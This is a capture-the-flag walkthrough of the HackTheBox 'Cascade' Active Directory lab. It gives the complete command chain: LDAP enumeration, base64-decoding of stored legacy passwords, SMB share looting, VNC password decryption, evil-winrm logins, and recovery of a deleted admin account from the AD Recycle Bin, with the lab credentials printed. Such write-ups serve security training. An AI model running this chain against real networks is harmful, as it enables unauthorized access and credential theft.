Hey, Hackers! Today, we’re going to dive into the Cascade HackTheBox Active Directory challenge, which is all about exploring and discovering details. Let’s jump right in and have some fun!
Scanning
Let’s start scanning target ip using nmap
nmap -p- -sV -O -A 10.10.10.182
here i found bunch of open ports, i start enumerating and found nothing interesting on domain, smb and other ports then i decided to move on to ldap port for enumeration
LDAP Enumeration
using ldap search i first find naming context that we gonna use later
ldapsearch -H ldap://10.10.10.182 -x -s base namingcontexts
Then i try enumerating users using below command
ldapsearch -x -H ldap://10.10.10.182 -D 'CN=Schema,CN=Configuration,DC=cascade,DC=local' -b 'DC=cascade,DC=local' | grep userPrincipalName | sed 's/userPrincipalName: //'and found some users
Then i decide to store complete ldap search result inside a file so i can analyses them
ldapsearch -x -H ldap://10.10.10.182 -D 'CN=Schema,CN=Configuration,DC=cascade,DC=local' -b 'DC=cascade,DC=local' | tee ldapsearch.txtThen after little bit analysing i found a field named as cascadeLegacyPwd in r.thompson user
it was base64 encoded and after decoding i found a string that look like password
$ echo "clk0bjVldmE=" | base64 -d
rY4n5eva I tried this string with r.thompson user for enumerating shares and it worked :)
smbclient -L //10.10.10.182/ --user r.thompson --password rY4n5eva
I tried accessing Audit$ and Data Shares and able to access Data
smbclient //10.10.10.182/Data --user r.thompson --password rY4n5evaHere i want to list all files of this share so i use recurse method
smb: \> recurse ON
smb: \> lsthis will auto list all files and directories of this share, After listing done i found a html file named as Meeting_Notes_June_2018.html inside \IT\Email Archives i downloaded this file using get command
after reading this file i found some important details i.e. a deleted account with username TempAdmin and it’s password is same as the administrator account password
then i go back to smb listing result and found a another registry file named as VNC Install.reg inside \IT\Temp\s.smith i downloaded this file on my local system
i find a password field with hex inside this vnc file, then i started searching for vnc decypt tool on google and found a tool: https://github.com/trinitronx/vncpasswd.py
I cloned this tool on my kali linux and using this i decrypt the s.smith user password :)
Using this password with evil-winrm i login into s.smith account and found user.txt
evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
Here i decided to enumerate smb shares for s.smith user
$ smbclient -L //10.10.10.182/ --user s.smith --password sT333ve2
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Audit$ Disk
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
^[[Ado_connect: Connection to 10.10.10.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availablei tried accessing Audit$ share
smbclient //10.10.10.182/Audit$ --user s.smith --password sT333ve2In this share i found some interesting binary and a .db file
$ smbclient //10.10.10.182/Audit$ --user s.smith --password sT333ve2
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 23:31:26 2020
.. D 0 Wed Jan 29 23:31:26 2020
CascAudit.exe An 13312 Wed Jan 29 03:16:51 2020
CascCrypto.dll An 12288 Wed Jan 29 23:30:20 2020
DB D 0 Wed Jan 29 03:10:59 2020
RunAudit.bat A 45 Wed Jan 29 04:59:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 12:08:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 12:08:38 2019
x64 D 0 Mon Jan 27 03:55:27 2020
x86 D 0 Mon Jan 27 03:55:27 2020
6553343 blocks of size 4096. 1618893 blocks available
smb: \> get CascAudit.exe
getting file \CascAudit.exe of size 13312 as CascAudit.exe (8.7 KiloBytes/sec) (average 8.7 KiloBytes/sec)
smb: \> get CascCrypto.dll
getting file \CascCrypto.dll of size 12288 as CascCrypto.dll (10.0 KiloBytes/sec) (average 9.2 KiloBytes/sec)
smb: \> cd DB
smb: \DB\> dir
. D 0 Wed Jan 29 03:10:59 2020
.. D 0 Wed Jan 29 03:10:59 2020
Audit.db An 24576 Wed Jan 29 03:09:24 2020
6553343 blocks of size 4096. 1618893 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (9.8 KiloBytes/sec) (average 9.5 KiloBytes/sec)
smb: \DB\> SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected nowI downloaded them on my system
I found out Audit.db is SQLite3 file using find command
$ file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 60, database pages 6, 1st free page 6, free pages 1, cookie 0x4b, schema 4, UTF-8, version-valid-for 60Using SQLight database tool i open this db file
Inside Ldap table i found another user and encrypted password :(
Now the task we had to do is disassemble exe and dll files we found on smb share. using same file method i find it’s a .NET file
using dnSpy i open both exe and dll file and found out aes encryption with Key and secret
using online AES decryption tool i able to crack this encryption
Then using these credentials with evil-winrm i login inside ArkSvc User
$ evil-winrm -i 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents>after little bit enumeration i found that this user is a part of some interesting group i.e.
After some google search about AD Recycle Bin i found out that we can restore the old mistakenly deleted accounts or some info about that account: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#a-d-recycle-bin
That means we can try to recover or grab some information about the TempAdmin account
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *In result i found TempAdmin information
Here cascadeLegacyPwd grabbed all my attention i directly copy the value of this field and decode this using base64
$ echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles It look like password of TempAdmin if it work with TempAdmin then it gonna work with Administrator user too as we find before
Username is TempAdmin (password is the same as the normal admin account password)
I tried login using this password on administrator user with evil-winrm and it work like charm :)
Cascade Completed Successfully !!
